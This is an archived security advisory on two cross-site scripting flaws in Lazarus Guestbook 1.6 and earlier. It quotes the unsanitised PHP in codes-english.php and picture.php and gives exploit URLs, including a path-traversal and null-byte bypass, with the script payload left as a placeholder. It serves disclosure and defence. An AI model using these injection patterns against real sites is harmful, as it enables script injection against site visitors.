TUCoPS :: Web :: Guestbooks

TUCoPS :: Web :: Guestbooks :: b06-3562.htm
Lazarus Guestbook Cross Site Scripting Vulnerabilities

Lazarus Guestbook Cross Site Scripting Vulnerabilities Lazarus Guestbook Cross Site Scripting Vulnerabilities


Produce : Lazarus Guestbook=0D
Website : http://carbonize.co.uk/Lazarus/=0D 
Version : <= 1.6=0D
Problem : Cross Site Scripting=0D
=0D
1) =0D
The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised=0D
This can be exploited to execute arbitrary HTML and javascript code=0D
=0D
 Vulnerable code in  lang/codes-english.php near line 4=0D
=0D
1  =0D
2  =0D
3  =0D
4  <?php echo($_GET['show']); ?> =0D
=0D
Exploit : =0D
=0D
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]=0D 
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E=0D 
=0D
=0D
2)=0D
the seconde probleme is in picture.php , the script verifiy fist if image file exists=0D
after it display it ,=0D
=0D
vulnerable code : in picture.php=0D
********************************=0D
=0D
24  if (!empty($_GET['img'])) {=0D
26      if (file_exists("$GB_TMP/$_GET[img]")) {=0D
27          $size = @GetImageSize("$GB_TMP/$_GET[img]");=0D
28          $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";=0D
29      }=0D
..      ............=0D
49      =0D
50      \n";=0D
53        }=0D
54    ?>=0D
55        =0D
    =0D
****************=0D
    if magic_quote_gpc = OFF we can bypass this protection by specifing existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 )=0D
    =0D
POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]=0D 
    =0D
    file_exists("$GB_TMP/$_GET[img]") will return true and html code will be executed=0D
    =0D
    Exploit: =0D
    =0D
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]=0D 
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E=0D 
    =0D
Contact : simo64[at]gmail[dot]com=0D
Moroccan Security Research Team